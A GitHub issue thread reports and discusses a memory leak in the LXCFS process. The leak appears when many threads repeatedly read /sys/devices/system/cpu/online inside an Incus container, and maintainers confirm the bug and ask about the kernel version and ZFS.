-
Notifications
You must be signed in to change notification settings - Fork 253
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Memory leak while reading /sys/devices/system/cpu/online inside an Incus container #677
Comments
Hi everyone, If there’s any additional information we can provide or if there's any way we can assist in diagnosing the issue, please feel free to let me know. I'm here to help in any way possible. Thank you! Regards, |
Hey @DeyanSG, thanks for such a detailed report. I'm on the way to investigate this. I'll let you know if any additional info is needed. |
A direct_io one will definitely make things worse in case of memory leak on the LXCFS side, but it doesn't mean that this change is wrong. direct_io is the only way with LXCFS. Just imagine having a page cache on procfs ;-) Please, can you tell me you kernel version on the host and if you use ZFS by any chance. |
Hi, @mihalicyn, Thank you for looking into the issue!
I am more than sure direct_io should be turned on as a couple of years ago we were running a version before this commit and we saw some of the weird stuff that the cache was causing :).
The host is using kernel 6.6.63. We've also tested with our previous kernel - 6.6.21 while trying to find what caused the issue just to rule out the kernel upgrade and we were able to reproduce the issue with this one as well. We do not use ZFS . |
I can confirm this. I'm actively investigating this and will fix it soon. Huge thanks again for such a detailed report. |
Hello,
We are using Incus + lxcfs in our setup and we’ve come to an issue with memory consumption of the lxcfs process while reading aggressively from
/sys/devices/system/cpu/online
.Versions
We’ve tested with different versions of both lxcfs and libfuse3 and the issue seems to be present even with the latest stable versions:
Setup
We are running an Incus container on a node with 56 CPU cores. It seems reproducible even with one single container. In our setup the container itself is restricted in CPU usage using limits.cpu.allowance: 1200ms/60ms (although not very relevant it is much faster to see the effect if the container can use more CPU).
Reproducer
To reproduce the issue, compile the following C code that starts a number of threads inside the container, each opening, reading from and then closing а file:
Run it with the following command in a container:
./fuse-stress-poc 400 /sys/devices/system/cpu/online
Monitor the RSS memory usage of lxcfs. We can see it go over 1GB in about a minute. Then if we just stop/kill the process inside the container the RSS memory usage stays around the same value instead of dropping back to about 2MB.
So far we’ve tried the following:
/proc/uptime
and/proc/cpuinfo
to see if we can see a leak with these files but we could not reproduce the issue, RSS usage stays low (around 2MB) while reading these files.We would appreciate your assistance in verifying if this issue is reproducible on your end, so we can collaborate effectively to identify and implement a solution.
While investigating other issues related to hanging lxcfs file operations, we inadvertently discovered this situation. As a result, we developed a stress test. Although we were unable to reproduce the hang, we identified what appears to be a memory leak.
Apologies for any confusion caused by the opening, resolving, and creating a new issue. I accidentally clicked the wrong option while typing.
Regards,
Deyan
The text was updated successfully, but these errors were encountered: